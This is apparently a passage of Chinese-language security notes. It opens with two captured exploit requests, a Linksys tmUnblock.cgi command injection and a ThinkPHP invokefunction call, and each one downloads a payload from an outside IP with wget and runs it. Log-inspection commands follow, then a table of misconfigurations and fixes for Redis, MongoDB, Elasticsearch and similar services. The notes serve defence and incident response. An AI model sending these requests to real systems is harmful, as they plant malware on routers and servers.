POST /tmUnblock.cgi HTTP/1.1
Host: 188.166.41.194:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h `cd /tmp; rm -rf mpsl; wget
http://165.22.136.161/vb/mpsl; chmod 777 mpsl; ./mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
|
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget
http://81.6.42.123/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Host: 103.27.111.204
|
grep ‘Accept’ /var/secure*
strings /var/wtmp
strings /var/lastlog
strings /var/utmp
strings /var/log/boot.log
cat. /root/.ssh/authorized_keys
|
服務名 | 常見未受權緣由 | 修復建議 |
redis | 6379對外開放,且使用弱口令或者未設置密碼 |
1 iptables 設定6379 ip白名單
2 設置redis強口令
|
jenkins | 弱口令、script未受權 |
1 設置強密碼
2 管理後臺建議禁止開放公網,建議使用iptables指定來源ip
|
mongodb | 27017 |
1 本地訪問
bind 127.0.0.1
2 修改默認端口
修改默認的mongoDB端口(默認爲: TCP 27017)爲其餘端口
3 禁用HTTP和REST端口
MongoDB自身帶有一個HTTP服務和並支持REST接口。在2.6之後這些接口默認是關閉的。mongoDB默認會使用默認端口監聽web服務,通常不須要經過web方式進行遠程管理,建議禁用。修改配置文件或在啓動的時候選擇–nohttpinterface 參數nohttpinterface = false
4 開啓日誌審計功能
審計功能能夠用來記錄用戶對數據庫的全部相關操做。這些記錄可讓系統管理員在須要的時候分析數據庫在什麼時段發生了什麼事情
5 開啓auth認證
/etc/mongodb.conf
auth = true
6 開啓鑑權模式
|
zookeeper | 2181 |
1 禁止把Zookeeper直接暴露在公網
2 添加訪問控制,根據狀況選擇對應方式(認證用戶,用戶名密碼,指定IP)
|
Es | 9200 |
1 默認開啓的9200端口和使用的端口不對外公佈,或架設內網環境。或者防火牆上設置禁止外網訪問9200端口。
2 架設nginx反向代理服務器,並設置http basic認證來實現elasticsearch的登陸認證。
3 限制IP訪問,綁定固定IP
4 爲elasticsearch增長登陸驗證,可使用官方推薦的shield插件.
|
Memcache | 11211 |
1.限制訪問
2.防火牆
3.使用最小化權限帳號運行Memcached服務
4.啓用認證功能
5.修改默認端口
6.按期升級
|
Hadoop | 8088 |
1 網絡訪問控制
2 啓用認證功能
3 更新補丁
|
Couchdb | 5984 |
1 指定CouchDB綁定的IP
2 設置訪問密碼
|
Docker | 2181 |
1 網絡訪問控制
2 低權限運行
|
K8s | 8080、6443 |
1 身份校驗
2 設置密碼
|
cms | 代碼執行、命令執行、注入等等 | 升級、打補丁 |